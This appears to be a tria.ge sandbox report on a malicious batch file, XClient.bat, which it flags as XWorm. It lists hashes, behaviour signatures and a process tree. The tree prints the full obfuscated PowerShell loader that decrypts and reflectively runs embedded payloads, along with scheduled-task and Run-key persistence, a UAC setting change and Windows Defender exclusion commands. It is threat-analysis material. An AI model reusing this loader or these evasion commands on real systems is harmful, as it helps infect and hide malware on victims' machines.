Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
04/09/2024, 03:02
240904-djne2svhpa 1004/09/2024, 03:01
240904-djb21svhne 104/09/2024, 01:09
240904-bhv3dstbjg 1003/09/2024, 23:53
240903-3xrgaszhqm 1003/09/2024, 23:29
240903-3gywfa1fna 1003/09/2024, 23:26
240903-3ev2rs1erg 10Analysis
-
max time kernel
120s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04/09/2024, 01:09
Static task
static1
Behavioral task
behavioral1
Sample
XClient.bat
Resource
win7-20240903-en
General
-
Target
XClient.bat
-
Size
320KB
-
MD5
e0d59aedb927f0aad0b47eab247e5fbc
-
SHA1
8abe8db8e344729b0f78d83e540b17a31893ed92
-
SHA256
ab6fed54d7e8fcd47d2888aae95498968192e13aaab8f8a09880b602ea98e81c
-
SHA512
7459cba2a54a2e26e7464f9f4863b1fedb63cfa80ed2261ee69fd9c268c5d6bb54a4d01368d7ed987387016d786fb115f84afe97e192545b1f860b020c805e97
-
SSDEEP
6144:HQIYl64Q3Gx/E7X3YIzsUW4MN2nwaF0FbD/VdFzqEE/jeT3/:HQIh77X3t6+4VdFzoW/
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/memory/1316-97-0x000002197E100000-0x000002197E10E000-memory.dmp disable_win_def -
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/1316-49-0x000002197DC60000-0x000002197DCBA000-memory.dmp family_xworm -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" powershell.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 18 1316 powershell.exe 28 1316 powershell.exe 46 1316 powershell.exe 51 1316 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 448 powershell.exe 900 powershell.exe 808 powershell.exe 2856 powershell.exe 1316 powershell.exe 2064 powershell.exe 1216 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3796 System User -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System User = "C:\\Users\\Admin\\AppData\\Roaming\\System User" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4040 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 2064 powershell.exe 2064 powershell.exe 1216 powershell.exe 1216 powershell.exe 1316 powershell.exe 1316 powershell.exe 2856 powershell.exe 2856 powershell.exe 448 powershell.exe 448 powershell.exe 900 powershell.exe 900 powershell.exe 808 powershell.exe 808 powershell.exe 1316 powershell.exe 3796 System User 3796 System User -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2064 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeIncreaseQuotaPrivilege 1216 powershell.exe Token: SeSecurityPrivilege 1216 powershell.exe Token: SeTakeOwnershipPrivilege 1216 powershell.exe Token: SeLoadDriverPrivilege 1216 powershell.exe Token: SeSystemProfilePrivilege 1216 powershell.exe Token: SeSystemtimePrivilege 1216 powershell.exe Token: SeProfSingleProcessPrivilege 1216 powershell.exe Token: SeIncBasePriorityPrivilege 1216 powershell.exe Token: SeCreatePagefilePrivilege 1216 powershell.exe Token: SeBackupPrivilege 1216 powershell.exe Token: SeRestorePrivilege 1216 powershell.exe Token: SeShutdownPrivilege 1216 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeSystemEnvironmentPrivilege 1216 powershell.exe Token: SeRemoteShutdownPrivilege 1216 powershell.exe Token: SeUndockPrivilege 1216 powershell.exe Token: SeManageVolumePrivilege 1216 powershell.exe Token: 33 1216 powershell.exe Token: 34 1216 powershell.exe Token: 35 1216 powershell.exe Token: 36 1216 powershell.exe Token: SeIncreaseQuotaPrivilege 1216 powershell.exe Token: SeSecurityPrivilege 1216 powershell.exe Token: SeTakeOwnershipPrivilege 1216 powershell.exe Token: SeLoadDriverPrivilege 1216 powershell.exe Token: SeSystemProfilePrivilege 1216 powershell.exe Token: SeSystemtimePrivilege 1216 powershell.exe Token: SeProfSingleProcessPrivilege 1216 powershell.exe Token: SeIncBasePriorityPrivilege 1216 powershell.exe Token: SeCreatePagefilePrivilege 1216 powershell.exe Token: SeBackupPrivilege 1216 powershell.exe Token: SeRestorePrivilege 1216 powershell.exe Token: SeShutdownPrivilege 1216 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeSystemEnvironmentPrivilege 1216 powershell.exe Token: SeRemoteShutdownPrivilege 1216 powershell.exe Token: SeUndockPrivilege 1216 powershell.exe Token: SeManageVolumePrivilege 1216 powershell.exe Token: 33 1216 powershell.exe Token: 34 1216 powershell.exe Token: 35 1216 powershell.exe Token: 36 1216 powershell.exe Token: SeIncreaseQuotaPrivilege 1216 powershell.exe Token: SeSecurityPrivilege 1216 powershell.exe Token: SeTakeOwnershipPrivilege 1216 powershell.exe Token: SeLoadDriverPrivilege 1216 powershell.exe Token: SeSystemProfilePrivilege 1216 powershell.exe Token: SeSystemtimePrivilege 1216 powershell.exe Token: SeProfSingleProcessPrivilege 1216 powershell.exe Token: SeIncBasePriorityPrivilege 1216 powershell.exe Token: SeCreatePagefilePrivilege 1216 powershell.exe Token: SeBackupPrivilege 1216 powershell.exe Token: SeRestorePrivilege 1216 powershell.exe Token: SeShutdownPrivilege 1216 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeSystemEnvironmentPrivilege 1216 powershell.exe Token: SeRemoteShutdownPrivilege 1216 powershell.exe Token: SeUndockPrivilege 1216 powershell.exe Token: SeManageVolumePrivilege 1216 powershell.exe Token: 33 1216 powershell.exe Token: 34 1216 powershell.exe Token: 35 1216 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1316 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2964 wrote to memory of 2368 2964 cmd.exe 84 PID 2964 wrote to memory of 2368 2964 cmd.exe 84 PID 2368 wrote to memory of 4732 2368 net.exe 85 PID 2368 wrote to memory of 4732 2368 net.exe 85 PID 2964 wrote to memory of 2064 2964 cmd.exe 89 PID 2964 wrote to memory of 2064 2964 cmd.exe 89 PID 2064 wrote to memory of 1216 2064 powershell.exe 91 PID 2064 wrote to memory of 1216 2064 powershell.exe 91 PID 2064 wrote to memory of 3032 2064 powershell.exe 97 PID 2064 wrote to memory of 3032 2064 powershell.exe 97 PID 3032 wrote to memory of 4884 3032 WScript.exe 98 PID 3032 wrote to memory of 4884 3032 WScript.exe 98 PID 4884 wrote to memory of 1132 4884 cmd.exe 100 PID 4884 wrote to memory of 1132 4884 cmd.exe 100 PID 1132 wrote to memory of 3024 1132 net.exe 101 PID 1132 wrote to memory of 3024 1132 net.exe 101 PID 4884 wrote to memory of 1316 4884 cmd.exe 102 PID 4884 wrote to memory of 1316 4884 cmd.exe 102 PID 1316 wrote to memory of 2856 1316 powershell.exe 104 PID 1316 wrote to memory of 2856 1316 powershell.exe 104 PID 1316 wrote to memory of 448 1316 powershell.exe 107 PID 1316 wrote to memory of 448 1316 powershell.exe 107 PID 1316 wrote to memory of 900 1316 powershell.exe 110 PID 1316 wrote to memory of 900 1316 powershell.exe 110 PID 1316 wrote to memory of 808 1316 powershell.exe 112 PID 1316 wrote to memory of 808 1316 powershell.exe 112 PID 1316 wrote to memory of 4040 1316 powershell.exe 114 PID 1316 wrote to memory of 4040 1316 powershell.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:4732
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y+qf52DrQiYLUaozbbmw9JavODvF6+9CeZx0/k94u9k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4WB4xmZ2PUqqywaBQpnlmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vfVzQ=New-Object System.IO.MemoryStream(,$param_var); $AjFMf=New-Object System.IO.MemoryStream; $JrhbC=New-Object System.IO.Compression.GZipStream($vfVzQ, [IO.Compression.CompressionMode]::Decompress); $JrhbC.CopyTo($AjFMf); $JrhbC.Dispose(); $vfVzQ.Dispose(); $AjFMf.Dispose(); $AjFMf.ToArray();}function execute_function($param_var,$param2_var){ $AKLYU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eguYy=$AKLYU.EntryPoint; $eguYy.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$FsplU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($NLDPG in $FsplU) { if ($NLDPG.StartsWith(':: ')) { $wgQrx=$NLDPG.Substring(3); break; }}$payloads_var=[string[]]$wgQrx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_555_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_555.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_555.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_555.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵PID:3024
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y+qf52DrQiYLUaozbbmw9JavODvF6+9CeZx0/k94u9k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4WB4xmZ2PUqqywaBQpnlmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vfVzQ=New-Object System.IO.MemoryStream(,$param_var); $AjFMf=New-Object System.IO.MemoryStream; $JrhbC=New-Object System.IO.Compression.GZipStream($vfVzQ, [IO.Compression.CompressionMode]::Decompress); $JrhbC.CopyTo($AjFMf); $JrhbC.Dispose(); $vfVzQ.Dispose(); $AjFMf.Dispose(); $AjFMf.ToArray();}function execute_function($param_var,$param2_var){ $AKLYU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eguYy=$AKLYU.EntryPoint; $eguYy.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_555.bat';$FsplU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_555.bat').Split([Environment]::NewLine);foreach ($NLDPG in $FsplU) { if ($NLDPG.StartsWith(':: ')) { $wgQrx=$NLDPG.Substring(3); break; }}$payloads_var=[string[]]$wgQrx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:808
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"6⤵
- Scheduled Task/Job: Scheduled Task
PID:4040
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\System User"C:\Users\Admin\AppData\Roaming\System User"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3796
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5345e9f98bd5ff1def2f4cd73d9f83a8e
SHA19132828267045915fd009f9eac20def8371814be
SHA256bc9dbd892f1a74587f2a6810ede52e86c81872e9703c7c8ab05039994a45f1aa
SHA5125bf601c8463ba6a877a8f399bcfbd3b8ae456a008ab25461c574a6cdb98fff44bdac0b1304a526438b6c87d4ec735a382e2af3b17580a71f3fe54f5e48ff579f
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
944B
MD5dcac476fa19b9b7e00d97d937daf7e9f
SHA12753854fb9097e0c50667c4df11e336bada512e2
SHA256ebbf20b0c098d467090c4115109b5f707b559a8006e9c17f00235a5d23d60399
SHA51281d587000267413d0b829d783aa2ea4d6f7dfdf991d0463cd49bae3090f36db0b16a63b1ca28ae9a8e52fe2a516bffbad3ff624d5b55e8956d728bb44ed5ea4f
-
Filesize
944B
MD5cc19bcff372d20459d3651ba8aef50e7
SHA13c6f1d4cdd647864fb97a16b1aefba67fcee11f7
SHA256366473e774d8976c7fd4dc582220666fb61a4feb3f7c95e69b2a68ad9e446ec9
SHA512a0e360ca4b6e874fd44612bf4b17f3722c0619da4f6bade12a62efadae88c2d33460114eaafa2bc3fb1cef5bea07e745b8bee24f15d0cacaff5f4a521b225080
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
320KB
MD5e0d59aedb927f0aad0b47eab247e5fbc
SHA18abe8db8e344729b0f78d83e540b17a31893ed92
SHA256ab6fed54d7e8fcd47d2888aae95498968192e13aaab8f8a09880b602ea98e81c
SHA5127459cba2a54a2e26e7464f9f4863b1fedb63cfa80ed2261ee69fd9c268c5d6bb54a4d01368d7ed987387016d786fb115f84afe97e192545b1f860b020c805e97
-
Filesize
115B
MD5a7b7b62f3b27442287c18f730b0a11b9
SHA13b680024c1c2d8c8eaccb1c547b1dd551543a335
SHA2565fa765ed4e0693111ee9e12623bff7d68cc0bb2c67522692681523c9f9e5853b
SHA5123cb48ead89cea278623df38db52e56ba3edabdbc244a60914acf09f5e56a60d2a4da6a3d2539e8c85049602f4a7cd55f0126207ec9910e854bc3e1432f84941a